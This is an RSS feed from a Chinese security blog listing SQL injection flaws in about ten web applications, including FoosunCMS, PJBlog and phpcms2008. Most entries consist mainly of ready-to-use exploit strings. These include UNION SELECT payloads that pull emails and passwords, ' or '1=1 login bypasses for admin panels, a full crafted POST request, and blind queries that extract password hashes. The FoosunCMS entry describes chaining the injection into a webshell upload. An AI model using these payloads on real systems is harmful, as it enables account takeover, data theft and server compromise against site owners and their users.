SpookZanG » 注入 http://www.spookzang.net 安全,漏洞,发现,共享,交流 Tue, 27 Jul 2010 15:28:29 +0000 en hourly 1 http://wordpress.org/?v=3.0 Swoopo Clone 2010 SQL注入漏洞 http://www.spookzang.net/article/1465 http://www.spookzang.net/article/1465#comments Mon, 28 Jun 2010 03:02:23 +0000 admin http://www.spookzang.net/?p=1465 作者:L0rd CrusAd3r

程序介绍:
Swoopo Clone是一款收费的拍卖程序。

利用方法:

http://server/index.php?show=product&id=[sql]

官方补丁:
暂无

]]> http://www.spookzang.net/article/1465/feed 1 风讯网站管理系统存在SQL漏洞 http://www.spookzang.net/article/1442 http://www.spookzang.net/article/1442#comments Sat, 26 Jun 2010 09:56:24 +0000 admin http://www.spookzang.net/?p=1442 5.0]]> 影响版本:
FooSun > 5.0

程序介绍:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

漏洞分析:
在文件\User\award\awardAction.asp中:

14
15
16
17
18
19
20
21
22
23

 
Integral=NoSqlHack(request.QueryString("Integral")) //第14行
 
if action="join" then
 
User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")")
 
'获得当前参加人数--------------------------------
 
User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'")

数字变量Integral使用过滤字符的函数过滤导致sql注入漏洞的产生,导致可以修改表FS_ME_User的任意内容,配合系统的其他功能可以拿到webshell

漏洞利用:
注册用户登陆后,访问Url:

http://[spookzang.net]/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=0),usernumber= 0x6C006C002E00610073007000,LoginNum=(1

退出后再登陆,在文件管理处上传后缀为doc的webshell就可以拿到webshell。(利用IIS6对文件夹为*.asp的解析漏洞)

<*来源: Bug.Center.Team
链接: http://wavdb.com/vuln/1672
*>

]]> http://www.spookzang.net/article/1442/feed 0 WebMember SQL注入漏洞 http://www.spookzang.net/article/713 http://www.spookzang.net/article/713#comments Tue, 02 Jun 2009 22:33:27 +0000 admin http://www.spookzang.net/?p=713 利用方法:

http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user–

]]> http://www.spookzang.net/article/713/feed 2 Million Dollar Text Links SQL注入漏洞 http://www.spookzang.net/article/707 http://www.spookzang.net/article/707#comments Mon, 01 Jun 2009 02:29:20 +0000 admin http://www.spookzang.net/?p=707 利用方法:

http://www.[SpookZanG].net/demo/million/admin.link.modify.php?id=-6%20UNION%20SELECT%201,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9–

]]> http://www.spookzang.net/article/707/feed 0 PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞 http://www.spookzang.net/article/660 http://www.spookzang.net/article/660#comments Sat, 09 May 2009 03:29:56 +0000 admin http://www.spookzang.net/?p=660  

影响版本:PJBlog 3.0.6.170
程序介绍:
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。

漏洞分析:
在文件class/cls_logAction.asp中:

1
2
3
4

oldcate=request.form("oldcate")  //第429行
oldctype=request.form("oldtype")
 
D = conn.execute("select cate_Part from blog_Category where  cate_ID="&oldcate)(0)

程序没有对变量oldcate做任何过滤放入sql查询语句中,导致注入漏洞的产生。

漏洞利用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

POST /blogedit.asp HTTP/1.1
Accept: application/x-shockwave-flash,  image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword,  application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://127.0.0.1/blogedit.asp?id=1
Accept-Language:  zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU:  x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible;  MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)
Host:  127.0.0.1
Content-Length: 513
Connection: Keep-Alive
Cache-Control:  no-cache
Cookie:  __utma=96992031.4542583209449947600.1239335726.1240296350.1240324232.7;  __utmz=96992031.1239335726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);  PJBlog3Setting=ViewType=normal;  PJBlog3=memRight=111111111111&memHashKey=c80f369e20b317566f736dbc70839834745d9c20&memName=admin&exp=2010%2D4%2D21;  ASPSESSIONIDCCDSDABA=OEBBHCODJFKIJEGKGCPHGMCP
 
id=1&log_editType=1&action=post&log_IsDraft=False&title=xxx&log_CateID=3&cname=xxx&ctype=0&oldcname=xxx&oldtype=0&oldcate=3201=1&log_weather=sunny&log_Level=level3&log_comorder=1&blog_pws=0&log_Readpw=&log_Pwtips=&c_pws=0&blog_Meta=0&evio_KeyWords=xxx&evio_Description=web+safe&log_From=%E6%9C%AC%E7%AB%99%E5%8E%9F%E5%88%9B&log_FromURL=http%3A%2F%2Flocalhost%2Fbackci%2F&PubTimeType=com&PubTime=2009-4-21+15%3A54%3A46&tags=&UBBfonts=&UBBfonts=&UBBfonts=&UBBmethod=on&Message=web+safe&log_Intro=web+safe&log_Quote=

解决方案:
厂商补丁:
PJblog
——-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://bbs.pjhome.net/thread-52214-1-1.html

信息来源:
<*来源: Bug.Center.Team http://www.cnbct.org
链接: http://wavdb.com/vuln/1410 *>

]]> http://www.spookzang.net/article/660/feed 1 chCounter 3.1.3的SQL注入漏洞! http://www.spookzang.net/article/603 http://www.spookzang.net/article/603#comments Wed, 22 Apr 2009 05:43:15 +0000 admin http://www.spookzang.net/?p=603 前提:magic quotes = off

来到登录页面

http://[SpookZanG]//counter/stats/index.php

用户名与密码都输入: or ‘=’

即可。

]]> http://www.spookzang.net/article/603/feed 0 NetHoteles 2.0/3.0 存在注入漏洞 http://www.spookzang.net/article/601 http://www.spookzang.net/article/601#comments Tue, 21 Apr 2009 02:40:58 +0000 admin http://www.spookzang.net/?p=601 来到后台:

http://www.[spookzang].net/superadmin (默认)

用户名和密码分别输入:’ or ’1=1

即可登入。

]]> http://www.spookzang.net/article/601/feed 0 Online Guestbook存在SQL注入漏洞 http://www.spookzang.net/article/599 http://www.spookzang.net/article/599#comments Mon, 20 Apr 2009 09:36:54 +0000 admin http://www.spookzang.net/?p=599 利用方法

http://www.[SpookZanG].Net/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5

]]> http://www.spookzang.net/article/599/feed 0 My Dealer Cms 2.0存在SQL注入漏洞! http://www.spookzang.net/article/607 http://www.spookzang.net/article/607#comments Mon, 13 Apr 2009 21:48:22 +0000 admin http://www.spookzang.net/?p=607 来到登入点:(默认)

http://[SpookZanG]/demo/admin/

用户名和密码输入:

‘ or ’1=1

即可。

]]> http://www.spookzang.net/article/607/feed 0 phpcms2008 ask的0DAY http://www.spookzang.net/article/491 http://www.spookzang.net/article/491#comments Fri, 20 Mar 2009 12:43:14 +0000 admin http://www.0day.hk/?p=491 受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

<?php
require ‘./include/common.inc.php’;
require_once MOD_ROOT.‘include/ask.class.php’;
$ask = new ask();
header(‘Content-type: text/html; charset=utf-8′);
if(strtolower(CHARSET) != ‘utf-8′) $q = iconv(CHARSET, ‘utf-8′, $q);
if($q)
{
$where = “ title LIKE ’%$q%’ AND status = 5″;
}
else
{
exit(‘null’);
}
$infos = $ask->listinfo($where, ‘askid DESC’, ”, 10);
 
foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, ‘<span class=”c_orange”>’.$q.‘</span>’, $val['title']);
$info[$key]['title'] = CHARSET != ‘utf-8′ ? iconv(CHARSET, ‘utf-8′, $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}
 
echo(json_encode($info));
?>

ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
From http://www.nukeblog.cn/article/125.htm

]]> http://www.spookzang.net/article/491/feed 0